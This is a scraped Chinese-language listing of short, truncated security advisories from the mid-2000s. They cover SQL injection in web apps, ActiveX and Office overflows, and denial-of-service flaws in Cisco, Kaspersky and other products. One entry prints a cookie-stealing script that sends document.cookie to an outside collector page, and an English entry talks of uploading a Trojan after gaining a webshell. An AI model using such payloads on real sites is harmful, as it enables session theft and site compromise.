微信打赏（Wechat Reward) Security Vulnerabilities

IBM AIX FTPD拒绝服务及信息泄露漏洞

IBM AIX是一款商业性质的UNIX操作系统。 IBM AIX的ftpd中的漏洞允许本地攻击者获取puseronly和pgrouponly口令保护的匿名用户的口令；此外，通过认证的远程ftp用户还可能耗尽计算机上所有可用的临时端口，导致拒绝服务。 IBM AIX 5.3 IBM AIX 5.2 IBM AIX 5.1 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：...

Adobe Acrobat Reader畸形文档处理堆溢出漏洞

Adobe Acrobat Reader是非常流行的PDF文件阅读器。 Adobe产品在渲染特制的PDF文件时存在堆溢出漏洞，远程攻击者可能通过利用此漏洞诱骗用户打开恶意文件控制用户机器。 相关的代码段如下： ----// SNIP SNIP //------------------------------------------------- 0:000> u 08009d3f CoolType+0x9d3f: 08009d3f 83e904 sub ecx,0x4 08009d42 890da07a1d08 mov ...

Microsoft Windows矢量标记语言缓冲区溢出漏洞（MS07-004）

Microsoft Windows是微软发布的非常流行的操作系统。 多个Microsoft产品的矢量标记语言（VML）支持中存在整数溢出，远程攻击者可能利用此漏洞控制用户机器。 在vgx.dll中缺少充分的输入验证，两个整数数据做了乘法运算但没有执行整数溢出检查，这可能允许攻击者强制分配比实际需要少的内存。在将用户提供的数据拷贝到新分配的缓冲区时，就会覆盖堆上所储存的函数指针，导致执行任意指令。远程攻击者可能通过诱骗用户访问恶意网页或点击包含恶意内容的邮件来利用此漏洞。 Microsoft Internet Explorer 7.0 Microsoft Internet Explorer.....

Cisco IOS数据链路交换拒绝服务漏洞

Cisco IOS的数据链路交换（DLSw）功能允许通过IP网络传输IBM系统网络架构（SNA）和网络基础输入/输出系统（NetBIOS）通讯。 Cisco IOS DLSw功能在协调交互过程中处理某些无效选项时存在漏洞，远程攻击者可能利用此漏洞执行拒绝服务攻击，导致设备重载。 创建DLSw通讯包括以下几个操作阶段。 在第一阶段，DLSw对等端通过TCP 2065或2067端口相互创建两个TCP连接，这些TCP连接是DLSw通讯的基础。 创建连接之后DLSw伙伴在第二阶段交换所支持功能的列表，这有助于对等端使用相同的选项，如果DLSw伙伴由不同厂商生产的话这一点尤其重要。 ...

Microsoft Office巴西葡萄牙语语法检查器远程代码执行漏洞（MS07-001）

Microsoft Office是非常流行的办公软件套件。 Office 2003葡萄牙语（巴西）语法检查器中存在一个远程执行代码漏洞，远程攻击者可能利用此漏洞控制用户机器。 攻击者可以通过诱骗用户打开恶意文档来利用此漏洞，如果用户使用管理用户权限登录，成功利用此漏洞的攻击者便可完全控制受影响的系统。攻击者可随后安装程序；查看、更改或删除数据；或者创建拥有完全用户权限的新帐户。那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。 Microsoft Office 2003 SP2（巴西葡萄牙语版本） Microsoft Office Multilingual.....

Microsoft Outlook高级查找功能远程代码执行漏洞（MS07-003）

Microsoft Outlook是Office套件所捆绑的邮件客户端。 Microsoft Outlook在处理畸形的.oss（Office Saved Searches）文件时存在漏洞，远程攻击者可能利用此漏洞控制用户机器。 攻击者可能通过诱骗用户打开畸形.oss文件利用此漏洞。如果用户使用管理用户权限登录，成功利用此漏洞的攻击者便可完全控制受影响的系统。攻击者可随后安装程序；查看、更改或删除数据；或者创建拥有完全用户权限的新帐户。那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。 Microsoft Outlook 2003 Microsoft...

Microsoft Excel畸形列记录堆溢出漏洞（MS07-002）

Microsoft Excel是微软Office套件中的电子表格工具。 Excel在处理一些BIFF8记录类型的列字段中范围值的时候存在堆溢出漏洞，远程攻击者可能利用此漏洞远程控制用户机器。 攻击者可以创建带有无效的Column字段记录的Excel文件，则如果用户受骗打开了该文档的话就可能导致执行任意指令。 Microsoft Excel Viewer 2003 Microsoft Excel v.X for Mac Microsoft Excel 2004 for Mac Microsoft Excel 2003 Microsoft Excel 2002 Microsoft Excel.....

Snort GRE报文解码整数溢出漏洞

Snort是广泛部署的开放源码网络入侵检测系统（IDS）。很多其他IDS产品中也使用了Snort及其组件。 Snort的decode.c文件中DecodeGRE()函数在解码GRE协议时存在整数溢出漏洞，攻击者可能利用此漏洞获取某些敏感信息。 漏洞相关代码如下： ==BEGIN CODE== ... (line 3459 decode.c) void DecodeGRE(u_int8_t pkt, const u_int32_t len, Packet p) { u_int8_t flags; u_int32_t hlen; / GRE header length...

Microsoft Excel Opcode处理远程代码执行漏洞（MS07-002）

Microsoft Excel是微软Office套件中的电子表格工具。 Excel处理Opcode的方式存在漏洞，远程攻击者可能利用此漏洞控制用户机器。 攻击者可以通过诱骗用户打开包含Opcode的Excel文档来利用此漏洞，如果用户使用管理用户权限登录，成功利用此漏洞的攻击者便可完全控制受影响的系统。攻击者可随后安装程序；查看、更改或删除数据；或者创建拥有完全用户权限的新帐户。那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。 Microsoft Excel Viewer 2003 Microsoft Excel v.X for Mac Microsoft....

Microsoft Excel IMDATA记录远程代码执行漏洞（MS07-002）

Microsoft Excel是微软Office套件中的电子表格工具。 Excel解析文件和处理畸形的IMDATA记录时存在漏洞，远程攻击者可能利用此漏洞远程控制用户机器。 攻击者可以通过诱骗用户打开包含畸形IMDATA记录恶意的文档，在用户机器上执行任意指令，如果用户使用管理用户权限登录，成功利用此漏洞的攻击者便可完全控制受影响的系统。攻击者可随后安装程序；查看、更改或删除数据；或者创建拥有完全用户权限的新帐户。那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。 Microsoft Excel v.X for Mac Microsoft Excel...

HP多个产品PML Driver HPZ12服务本地权限提升漏洞

PML Driver HPZ12服务是很多HP产品（尤其是多合一产品、打印机、扫描仪等）所安装的驱动服务。 PML Driver HPZ12服务在执行权限管理时存在漏洞，本地攻击者可能利用此权限提升自己的权限。 PML Driver HPZ12服务没有设置安全的SERVICE_CHANGE_CONFIG权限。默认下安装该服务时有以下属性： Name: PML Driver HPZ12 Filename: HPZipm12.exe Description: Used by HP Printer/Scanner/Copier printers to prevent...

Sina UC 2006 Activex SendChatRoomOpt Exploit

新浪UC是中国非常流行的IM工具之一 http://www.51uc.com 漏洞的起因是Sina UC的多个ActiveX控件的参数缺乏必要的验证，攻击者构造恶意网页，可以远程完全控制安装了Sina UC 的用户的计算机， 多个控件存在栈溢出问题，包括但不限于： clsid:77AE4780-75E0-4CB0-A162-D1BBE3D50384 C:\Program Files\sina\UC\ActiveX\BROWSER2UC.dll Sub SendChatRoomOpt ( ByVal astrVerion As String , ByVal astrUserID As...

iGeneric iG Calendar USER.PHP SQL注入漏洞

iGeneric iG Calendar是一款基于PHP的WEB应用程序。 iGeneric iG Calendar不正确过滤用户提交的输入，远程攻击者可以利用漏洞进行SQL注入攻击，获得敏感信息。 问题是'USER.PHP'脚本对用户提交的'id'参数缺少过滤，提交恶意脚本代码作为参数数据，可导致获得敏感信息。 iGeneric iG Calendar 1.0 目前没有解决方案提供：...

WineGlass数据库敏感信息泄露漏洞

WineGlass是一款维基应用程序。 WineGlass数据库访问限制不正确，远程攻击者可以利用漏洞获得敏感信息。 直接下载在WEB ROOT目录中的data.mdb文件，可导致获得用户名和密码信息。 WineGlass 1.x ...

PowerArchiver PAISO.DLL ISO文件处理缓冲区溢出漏洞

PowerArchiver是一款解压缩程序。 PowerArchiver处理ISO映象文件存在缓冲区溢出，远程攻击者可以利用漏洞以应用程序进程权限执行任意指令。 问题存在于PAISO.DLL (version...

Sun Java Runtime System内容提送服务器信息泄露漏洞

Sun Java System Content Delivery Server可为移动用户提供可以下载的数据服务。 Sun Java System Content Delivery Server存在未明安全错误，远程攻击者可以利用漏洞未授权访问敏感信息。 目前没有详细漏洞细节提供。 Sun Java System Content Delivery Server (Solaris) 5.0PU1 Sun Java System Content Delivery Server (Solaris) 5.0 厂商解决方案 联系供应商安装patch 5.0_2005Q4_IR3_P6补丁：...

Kolayindir Download Down.ASP SQL注入漏洞

Kolayindir是一款基于ASP的WEB应用程序。 Kolayindir不正确过滤用户提交的输入，远程攻击者可以利用漏洞进行SQL注入攻击，获得敏感信息。 问题是'Down.ASP'脚本对用户提交的'id'参数缺少过滤，提交恶意脚本代码作为参数数据，可导致获得敏感信息。 Kolayindir Download 目前没有解决方案提供：...

Shopstorenow E-commerce Shopping Cart Orange.ASP SQL注入漏洞

Shopstorenow E-commerce Shopping Cart 是一款基于ASP的WEB应用程序。 Shopstorenow E-commerce Shopping Cart 不正确过滤用户提交的输入，远程攻击者可以利用漏洞进行SQL注入攻击，获得敏感信息。 问题是'Orange.ASP'脚本对用户提交的'CatID'参数缺少过滤，提交恶意脚本代码作为参数数据，可导致获得敏感信息。 Shopstorenow E-commerce Shopping Cart 目前没有解决方案提供：...

WordPress Charset解抹SQL注入漏洞

WordPress是一款流行的网络日记程序。 WordPress处理字符集解码存在问题，远程攻击者可以利用漏洞进行SQL注入攻击，获得敏感信息。 在当PHP的mbstring扩展激活时，WordPress支持使用不同字符集解码Trackback，因为解码发送在数据库为输入数据执行选择正确的字符集之前，因此允许绕过针对SQL注入的保护。 为了演示需要，Stefan Esser建议使用UTF-7字符集来利用，因为其他的多字节字符集允许多字节序列以''结尾。...

Fetchmail多个密码信息泄露漏洞

Fetchmail是一款多功能的IMAP和POP客户程序。 Fetchmail存在设计问题，远程攻击者可以利用漏洞可能获得用户密码敏感信息。 具体问题如下： -sslcertck/sslfingerprint选项本来必须应用到"sslproto tls1"来迫使使用TLS协商，但程序没有。 -在配置文件中即使使用"sslproto tls1"，但如果STLS/STARTTLS没有使用，获取邮件也是明文过程。 -无论TLS选项是否采用，POP3的抓取完全忽略TLS，因为在检查STLS支持前没有可靠的发送CAPA，而CAPA是STLS所必须的。无论CAPA是否检测到，依靠的是"auth"选项。....

DigiAppz DigiRez Info_Book.ASP SQL注入漏洞

DigiAppz DigiRez是一款基于ASP的WEB应用程序。 DigiAppz DigiRez不正确过滤用户提交的输入，远程攻击者可以利用漏洞进行SQL注入攻击，获得敏感信息。 问题是'Info_Book.ASP'脚本对用户提交的WEB参数缺少过滤，提交恶意脚本代码作为参数数据，可导致获得敏感信息 Digiappz Digirez 3.4 Digiappz Digirez 3.3 Digiappz Digirez 3.2 Digiappz Digirez 3.1 Digiappz Digirez 3.0 目前没有解决方案提供：...

Avahi压缩DNS拒绝服务漏洞

Avahi是一款用于在本地网络搜寻可应用服务的应用程序。 Avahi处理压缩DNS存在问题，远程攻击者可以利用漏洞对应用程序进行拒绝服务攻击。 提交恶意的压缩的DNS包信息，可导致Avahi崩溃，目前没有详细漏洞细节提供。 Ubuntu Ubuntu Linux 5.10 sparc Ubuntu Ubuntu Linux 5.10 powerpc Ubuntu Ubuntu Linux 5.10 i386 Ubuntu Ubuntu Linux 5.10 amd64 Ubuntu Ubuntu Linux 6.10 sparc Ubuntu Ubuntu Linux 6.10...

Coppermine Photo Gallery Albmgr.PHP注入漏洞

Coppermine Photo Gallery是一款基于PHP的WEB应用程序。 Coppermine Photo Gallery不正确过滤用户提交的输入，远程攻击者可以利用漏洞进行SQL注入攻击，获得敏感信息。 问题是'Albmgr.PHP'脚本对用户提交的WEB参数缺少过滤，提交恶意脚本代码作为参数数据，可导致获得敏感信息。 Coppermine Photo Gallery 1.4.10 Coppermine Photo Gallery 1.4.9 Coppermine Photo Gallery 1.4.4 Coppermine Photo Gallery 1.3...

IGeneric IG Shop SQL注入漏洞

IGeneric IG Shop是一款基于PHP的WEB应用程序。 IGeneric IG Shop不正确过滤用户提交的输入，远程攻击者可以利用漏洞进行SQL注入攻击，获得敏感信息。 问题是'compare_product.php'脚本对用户提交的'id'参数缺少过滤，提交恶意脚本代码作为参数数据，可导致获得敏感信息。 iGeneric iG Shop 1.0 目前没有解决方案提供：...

Kaspersky反病毒扫描引擎PE文件拒绝服务漏洞

Kaspersky Antivirus是一款流行的客户端和网关病毒扫描。 Kaspersky Antivirus处理特殊构建的PE文件存在问题，远程攻击者可以利用漏洞对应用程序进行拒绝服务攻击。 PE文件中其中之一的头数据是可选Windows头数据段，这个PE头字段数据包含Windows链接器和装载器所需的信息，如果'NumberOfRvaAndSizes'字段中数据包含非法值，可导致应用程序崩溃。 Kaspersky Anti-Virus Personal Pro 5.0 Kaspersky Anti-Virus Personal 5.0 Kaspersky Anti-Virus for....

Kaspersky AntiVirus扫描引擎PE文件处理拒绝服务漏洞

Kaspersky Antivirus是非常流行的杀毒软件。 Kaspersky Antivirus在处理特制的PE文件时存在拒绝服务漏洞，远程攻击者可能利用此漏洞导致扫描引擎陷入死循环。 PE文件中的一个头部结构选项是Optional Windows Header部分，该部分包含有Windows链接器和加载器所需要的信息。NumberOfRvaAndSizes字段的无效值会导致Kaspersky在无限循环中反复地寻找并读取文件的同一部分，这样扫描引擎就会陷入死循环，无法再扫描文件。 Kaspersky Labs Kaspersky Antivirus 6.0 for Windows...

Cisco Clean Access可猜测快照文件漏洞

Cisco Clean Access (CCA)是一款用于自动检测、隔离、清除受恶意代码感染的设备访问网络解决方案。 Cisco Clean Access处理快照文件名存在问题，远程攻击者可以利用漏洞下载数据库文件获得敏感信息。 Cisco Clean Access手工备份的数据库快照存在文件名可猜测并下载影响，攻击者可能无需认证下载到备份数据库，而此数据库文件没有加密及其他保护。此漏洞的Cisco Bug ID为CSCsd48626，影响如下的CCA版本： CCA releases 3.5.x - 3.5.9 CCA releases 3.6.x - 3.6.1.1 Cisco...

Solve the free space can not FTP upload Trojan issues-vulnerability warning-the black bar safety net

Get the Webshell, and if you want to hang horse, you need to have a support Ftp upload space. For I poor devils, only with free space. And the used free space of the people know for sure that Ftp is not uploading the Trojan, unless it isfree to kill. The spatial spread no Trojan, then do not...

Deep CMS Index.PHP远程文件包含漏洞

Deep CMS是一款基于PHP的内容管理程序。 Deep CMS不正确过滤用户提交的URI数据，远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是由于'index.php'脚本对用户提交的'ConfigDir'参数缺少过滤，提交恶意的远程服务器作为包含对象，可导致以WEB进程权限执行任意PHP代码。 Deep CMS Deep CMS 2.0a 目前没有详细解决方案提供，请关注以下链接：...

Nuked Klan任意.SWF文件COOKIE窃取漏洞

Nuked Klan是一款基于ASP的WEB应用程序。 Nuked Klan处理.swf文件存在问题，远程攻击者可以利用漏洞获取其他目标用户的敏感COOKIE信息。 构建一个.swf文件，放置如下代码： getURL("javascript:alert('document.location="http://site.com/cookie.php? cookie="+document.cookie');"); 或者 <?php $cookie = $_GET['cookie']; $ip = getenv ('REMOTE_ADDR'); $date=date("m/d/Y g:i:s....

Simplog Archive.PHP SQL注入漏洞

Simplog是一款基于PHP的WEB应用程序。 Simplog不正确过滤用户提交的输入，远程攻击者可以利用漏洞进行SQL注入攻击，获得敏感信息。 问题是'Copy_Cacti_User.PHP'脚本对用户提交的'pid'参数缺少过滤，提交恶意脚本代码作为参数数据，可导致获得敏感信息。 Simplog Simplog 0.9.3 .2 目前没有解决方案提供：...

Rediff Bol Downloader ActiveX控件远程代码执行漏洞

Rediff Bol Downloader ActiveX控件是一款下载文件控件。 Rediff Bol Downloader ActiveX控件存在设计问题，远程攻击者可以利用漏洞以应用程序进程权限执行任意命令。 Microsoft Internet Explorer在Downloader ActiveX控件指向Intenet上的可执行文件时，可报警，但是如果指向本地文件会没任何提示。构建恶意WEB页，诱使用户处理，可导致泄露敏感信息或下载执行任意命令。 Rediff Bol Downloader ActiveX control 目前没有解决方案提供：...

Microsoft Windows Csrss HardError 消息多个安全漏洞

Microsoft Windows是一款流行的操作系统。 Microsoft Windows处理特殊参数的部分API调用时存在问题，本地攻击者可以利用漏洞获得敏感信息或对系统进行拒绝服务攻击。 Microsoft Windows的WINSRV.DLL在处理HardError消息时存在两次释放错误。攻击者如果把MessageBox()函数的caption或text参数设置为以“??\”开始的字符串，那么畸形的参数会触发内核内存破坏，导致系统崩溃。 另外CSRSS.exe没有正确的验证由NtRaiseHardError传送的参数，可允许攻击者浏览CSRSS进程内存的内容，导致敏感信息泄露。...

Cisco Clean Access多个远程安全漏洞

Cisco Clean Access (CCA)是一种用于自动检测、隔离、清除受恶意代码感染的设备访问网络的软件解决方案。 CCA的实现上存在两个安全漏洞，远程攻击得可能利用这些漏洞获取非授权访问或得到敏感信息。 CCA与Cisco Clean Access Manager (CAM)交互时，交互双方需要相同的密钥，CAM端的密钥在CAM和CAS初始化时设定，CCA实现上的漏洞使此密钥不可被更改，网络上所有相关的设备共享了相同的密钥，可能导致非授权访问。此漏洞的Cisco Bug ID为CSCsd48626，影响如下的CCA版本： CCA releases 3.6.x - 3.6.4.2.....

Apple Quicktime RTSP畸形URL处理缓冲区溢出漏洞

Apple QuickTime是一款流行的多媒体播放器，支持多种媒体格式。 Apple QuickTime在处理畸形的RTSP协议URL时存在缓冲区溢出漏洞，远程攻击者可能利用此漏洞在用户机器上执行任意指令。 Apple QuickTime在处理带超长“src”参数的RTSP协议的URL串时存在栈缓冲区溢出漏洞，远程攻击者可以通过构造类似“rtsp://[any character]:[>256 bytes]”的URL串诱使用户点击，系统调用QuickTime处理时导致溢出发生，执行攻击者的任意指令。 Apple QuickTime Player 7.x 临时解决方法：...

Click N' Print Coupons Coupon_Detail.ASP SQL注入漏洞

Click N' Print Coupons是一款基于ASP的WEB应用程序。 Click N' Print Coupons不正确过滤用户提交的输入，远程攻击者可以利用漏洞进行SQL注入攻击，获得敏感信息。 问题是'Coupon_Detail.ASP'脚本对用户提交的WEB参数缺少过滤，提交恶意脚本代码作为参数数据，可导致获得敏感信息。 Website Designs For Less Clink N' Print Coupons 2005.01 目前没有解决方案提供：...

TDiary未明远程代码执行漏洞

TDiary是一款类似WEBBLOG的日记软件。 TDiary存在一个未明安全问题，远程攻击者可以利用漏洞以应用程序进程权限执行任意指令。 目前没有详细漏洞细节提供。 tDiary tDiary 2.0.3 tDiary tDiary 2.0.2 tDiary tDiary 2.0.1 + Debian Linux 3.1 sparc + Debian Linux 3.1 s/390 + Debian Linux 3.1 ppc + Debian Linux 3.1 mipsel + Debian Linux 3.1 mips + Debian Linux 3.1 m68k +...

Cacti Copy_Cacti_User.PHP SQL注入漏洞

Cacti是一款基于PHP的WEB应用程序。 Cacti不正确过滤用户提交的输入，远程攻击者可以利用漏洞进行SQL注入攻击，获得敏感信息。 问题是'Copy_Cacti_User.PHP'脚本对用户提交的WEB参数缺少过滤，提交恶意脚本代码作为参数数据，可导致获得敏感信息。 Cacti Cacti 0.8.6i 目前没有解决方案提供：...

Wordpress Template.PHP HTML注入漏洞

Wordpress是一款基于PHP的网络日记程序。 Wordpress不正确过滤用户提交的输入，远程攻击者可以利用漏洞进行跨站脚本攻击，获得敏感信息。 问题是'Template.PHP'脚本对用户提交的WEB参数缺少过滤，提交恶意脚本代码作为参数数据，并诱使用户访问，可导致恶意脚本在目标用户浏览器上执行获得敏感信息。 WordPress Wordpress (B2) 0.6.2 .1 WordPress Wordpress (B2) 0.6.2 WordPress WordPress 2.0.5 WordPress WordPress 2.0.4 WordPress WordPress...

Rediff Bol Downloader允许文件下载及执行漏洞

Rediff Bol是一款即时通信工具。 Rediff Bol的Downloader控件在处理文件下载时存在漏洞，远程攻击者可能利用此漏洞在用户机器上执行任意命令。 Rediff Bol的Downloader控件允许任意网页下载并执行任意位置的程序而不会对其过滤，在IE中执行远程的程序时会报警，但在执行本地程序时不会有提示。 Rediff Bol Downloader 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：...

VLC Media Player畸形“udp://”URI格式串处理漏洞

VLC Media Player是一款免费的媒体释放器。 VLC Media Player在处理畸形的URI串时存在漏洞，远程攻击者可能利用此漏洞在用户机器上执行任意指令。 VLC Media Player在处理“udp://”开头的URI串时存在格式串处理漏洞，远程攻击者可能利用此漏洞通过诱使用户访问恶意网页或打开恶意M3U文件控制用户机器。 VideoLAN VLC Media Player 0.x 临时解决方法： 如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁： 不要打开来源不可信任的M3U文件。 厂商补丁： VideoLAN...

QQ漏洞（远程可执行）Tencent QQ VQQPlayer.ocx

No description provided by...

DMXREADY Secure Login Manager sent参数多个远程SQL注入漏洞

DMXReady Secure Login Manager允许用户方便快捷的访问网站中受口令保护的网页。 Secure Login Manager在处理用户请求时存在输入验证漏洞，远程攻击者可能利用此漏洞非授权访问数据库，导致敏感信息泄露或数据库破坏。 Secure Login Manager的多个脚本没有正确过滤sent参数的输入，允许攻击者通过在输入数据中插入特定的SQL语句恶意操作数据库。 DMXReady Secure Login Manager 1.0 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：...

Ananda Real Estate list.asp SQL远程注入漏洞

Ananda Real Estate是用于创建房地产站点的软件。 Ananda Real Estate在处理用户请求时存在输入验证漏洞，远程攻击者可能利用此漏洞非授权访问数据库，导致敏感信息泄露或数据库破坏。 Ananda Real Estate的list.asp脚本没有正确过滤agent参数的输入，允许攻击者通过在输入数据中插入特定的SQL语句恶意操作数据库。 Softwebs Nepal Ananda Real Estate 3.4 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：...

Discuz论坛爆物理路径

当把变量当成数组提交时，如果不存在该数组，但存在变量，后面的preg_match()正则表达式匹配不了， 这样就出现了绝对路径的泄露 Discuz!5.2 Discuz!5.1 Discuz!4.1 Discuz!4.0 http://www.discuz.net/ 打开论坛 include 目录下的 common.inc.php $extra = isset($extra) && preg_match 改成 $extra = isset($extra) &&...

RealPlayer IERPPLUG.DLL ActiveX控件远程拒绝服务漏洞

RealPlayer是非常流行的媒体播放器，支持多种格式。 IE浏览器在以畸形参数调用RealPlayer的IERPPLUG.DLL ActiveX控件时存在漏洞，恶意网站可能利用此漏洞导致用户浏览器崩溃。 如果用户受骗打开了恶意的WEB页面的话，就会触发这个漏洞，导致浏览器崩溃。 Real Networks RealPlayer 10.5 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：...

Adobe Reader AcroPDF.DLL ActiveX控件远程拒绝服务漏洞

Adobe Reader是非常流行的PDF文件阅读器。 IE浏览器在以畸形的参数调用Adobe Reader的AcroPDF.DLL ActiveX控件时存在漏洞，远程攻击者可能利用此漏洞导致浏览器崩溃。 如果用户受骗打开了恶意的WEB页面的话，就会触发这个漏洞，导致浏览器崩溃。 Adobe Acrobat Reader 7.0.8 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：...

Limbo CMS事件模块远程文件包含漏洞

Limbo是一种开源的基于PHP的Web内容管理系统。 Limbo CMS事件模块处理用户请求时存在输入验证漏洞，远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。 Limbo事件模块相关的eventcal/mod_eventcal.php脚本没有正确验证lm_absolute_path参数的输入，允许攻击者通过包含本地或外部资源任意文件导致执行任意PHP代码。漏洞代码如下： include_once($lm_absolute_path."components/com_event/lang/event.".$lm_language.".php");...

Cacti cmd.php脚本远程SQL注入漏洞

Cacti是一款轮循数据库（RRD）工具，可帮助从数据库信息创建图形，有多个Linux版本。 Cacti的cmd.php脚本处理用户提交的参数数据时存在输入验证漏洞，远程攻击者可能利用此漏洞执行SQL注入攻击。 Cacti的cmd.php脚本没有正确验证对URL的输入，允许攻击者通过SQL注入非授权操作数据库。成功攻击要求打开了register_argc_argv。此外没有过滤cmd.php中SQL查询的结果便用作了shell命令，这可能导致注入任意shell命令 Cacti Cacti 0.8.6i...

Chatwm SelGruFra.ASP SQL注入漏洞

Chatwm是一款基于ASP的WEB应用程序。 Chatwm不正确过滤用户提交的输入，远程攻击者可以利用漏洞进行SQL注入攻击，获得敏感信息。 问题是'SelGruFra.ASP'脚本对用户提交的WEB参数缺少过滤，提交恶意脚本代码作为参数数据，可导致获得敏感信息。 Chatwm Chatwm 1.0 目前没有解决方案提供：...